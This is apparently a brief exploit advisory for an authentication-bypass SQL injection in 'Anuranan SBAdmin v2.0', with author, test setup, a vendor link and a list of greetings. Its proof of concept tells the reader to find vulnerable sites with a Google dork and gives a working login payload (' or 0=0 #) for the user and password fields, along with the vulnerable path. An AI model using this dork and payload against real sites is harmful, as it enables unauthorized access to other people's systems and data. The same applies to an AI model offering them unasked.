Anuranan SBAdmin version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
777abdef14d1715032818c780653644b1d9e4cdab9ec3ec13d76875c88d01a11
====================================================================================================================================
| # Title : Anuranan SBAdmin v2.0 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits) |
| # Vendor : https://anuranangroup.com/ |
| # Dork : Created by: Anuranan Group |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : user&pass= ' or 0=0 #
[+] http://127.0.0.1/ipedexcellencecom/kontlo/index.php
====Greetings to :=======================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
=========================================================================================================================================